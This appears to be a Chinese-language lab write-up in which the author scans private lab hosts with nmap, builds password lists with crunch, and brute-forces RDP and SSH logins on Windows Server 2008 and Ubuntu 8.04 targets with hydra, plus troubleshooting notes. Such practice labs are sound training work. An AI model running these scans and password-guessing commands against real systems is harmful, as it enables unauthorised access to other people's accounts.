目录
一、实验
1.环境
2. Kali Linux (2024.1) 使用 namp 扫描目标主机
3.Kali Linux (2024.1)远程登录 Windows Server
4.Kali Linux (2024.1) 使用crunch字典工具
5.Kali Linux (2024.1)使用hydra密码工具
6.Kali Linux (2022.3) 通过SSH端口获取 Ubuntu 密码
二、问题
1.nmap (Network Mapper 网络探测器) 的命令格式和扫描类型
2.crunch有哪些特殊匹配字符
3.hydra的命令格式和选项参数
4.hydra 密码工具使用失败
5. Kali Linux(2022.3) 创建动态网卡
6.hydra 密码工具使用报错
一、实验
1.环境
(1)主机
表1 主机
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2024.1 | 192.168.204.146(动态) 192.168.204.100(静态) | |
| Windows server | 2008 R2 | 192.168.204.150 | Kali(2024.1)的目标主机 |
| Kali Linux | 2022.3 | 192.168.204.152(动态) | |
| Ubuntu | 8.04 | 192.168.204.143 | Kali(2022.3)的目标主机 |
(2)查看Kali Linux (2024.1)系统版本
cat /etc/os-release
(3)查看Kali Linux (2024.1)系统IP地址
ip addr
(4) 查看Windows server 2008 IP 地址
ipconfig
(5)查看Ubuntu 8.04 系统版本及IP地址
lsb_release -a
ip addr
2. Kali Linux (2024.1) 使用 namp 扫描目标主机
(1) 扫描
nmap 192.168.204.150
(2)扫描⽬标主机所有开放的端⼝(TCP半开扫描)
nmap -sS 192.168.204.150
(3)扫描⽬标主机所有开放的端⼝(TCP全开扫描)
nmap -sT 192.168.204.150
(4)扫描⽬标主机系统
nmap -O 192.168.204.150
(5)扫描⽬标主机所在⽹段所有存活的主机
nmap -sP 192.168.204.0/24
(6)扫描⽬标主机所有开放端⼝对应的服务和软件版本
nmap -sV 192.168.204.150
(7)扫描⽬标主机 3389端⼝的开放情况
nmap -sS -p 3389 192.168.204.150
(8)扫描⽬标主机 80和3389端⼝的开放情况
nmap -sS -p 80,3389 192.168.204.150
(9)扫描⽬标主机 20-80 之间的端⼝开放情况
nmap -sS -p 20-80 192.168.204.150
3.Kali Linux (2024.1)远程登录 Windows Server
(1)远程连接Windows Server 2008
rdesktop 192.168.204.150输入yes
(3) 弹出远程界面
输入账户密码
成功:
4.Kali Linux (2024.1) 使用crunch字典工具
(1)查看自带密码字典
vim /usr/share/wordlists
(2)使用crunch字典工具
1)随机组成6位纯数字密码
crunch 6 6 0123456789 -o test1.txt
2)由Abc1234随机组成的6~8位密码
crunch 6 8 Abc1234 -o test2.txt
3)以A开头后⾯跟3位数字组成的4位密码
crunch 4 4 -t A%%% -o test3.txt
5.Kali Linux (2024.1)使用hydra密码工具
(1) 使用hydra密码工具
hydra -l Administrator -P test4.txt 192.168.204.150 rdp
6.Kali Linux (2022.3) 通过SSH端口获取 Ubuntu 密码
(1)查看Kali Linux (2022.3)系统版本
cat /etc/os-release
(2)查看Kali Linux (2022.3)系统IP地址
ip addr | grep 152
(3) nmap 扫描目标主机
扫描⽬标主机所在⽹段所有存活的主机,发现新增192.168.204.143
nmap -sP 192.168.204.0/24
(2)扫描⽬标主机 22端⼝的开放情况
nmap -sS -p 22 192.168.204.143
(3)使用hydra密码工具
hydra -l msfadmin -P test5.txt 192.168.204.143 ssh
二、问题
1.nmap (Network Mapper 网络探测器) 的命令格式和扫描类型
(1)格式
nmap [扫描类型] [选项] <扫描⽬标>(2) 指定扫描类型
1)-sS
TCP半开扫描(只发SYN包,不会产⽣会话⽇志),速度快
s: scan 扫描
S:SYN2)-sT
TCP全开扫描(尝试全连接),结果更准确
T:TCP3) -sU
UDP扫描4) -sP
使⽤ICMP扫描,仅⽤于探测⽬标是否在线5) -O
O:OS操作系统
扫描操作系统6) -sV
扫描端⼝对应的服务版本
V:VERSION 版本(3)指定目标端口(p: port 端⼝ )
-p 3389 :扫描指定端⼝
-p 20-80 :扫描连续的端⼝
-p 22,80 :扫描多个指定端⼝(4)端口状态(STATE)
1) open开放的2)filtered探测报⽂被⽬标服务器的防火墙过滤和阻⽌了3)closed关闭的
2.crunch有哪些特殊匹配字符
(1)特殊匹配字符
@ --> 代表⼩写字⺟
, --> 代表⼤写字⺟
% --> 代表数字
^ --> 代表标点及特殊字符3.hydra的命令格式和选项参数
(1)格式
hydra [选项] ⽬标地址 服务类型
(2)选项参数
1)-l
指定⽤户名2)-L
指定⽤户名字典⽂件3)-P
指定密码字典⽂件4)-o
将结果输出到指定⽂件5)-v
显示破解过程6)-t
同时执⾏的任务数,默认16个4.hydra 密码工具使用失败
(1)报错
(2)原因分析
管理员账户拼写错误。
(3) 解决方法
修改为Administrator
成功:
hydra -l Administrator -P test4.txt 192.168.204.150 rdp
5. Kali Linux(2022.3) 创建动态网卡
(1) 修改网络配置文件
vim /etc/network/interfaces
修改前:
修改后:
auto eth0
iface eh0 inet dhcp
(2)重启网卡
/etc/init.d/networking restart
(3)查看IP
ip addr | grep 152
6.hydra 密码工具使用报错
(1)报错
(2)原因分析
hydra版本过⾼。
(3) 解决方法
使用v9.3版本
成功:
hydra -l msfadmin -P test5.txt 192.168.204.143 ssh
![[Vulnhub]靶场 Red](https://img-blog.csdnimg.cn/direct/908c0ef3ca7a40c38b753475fd84516d.png)
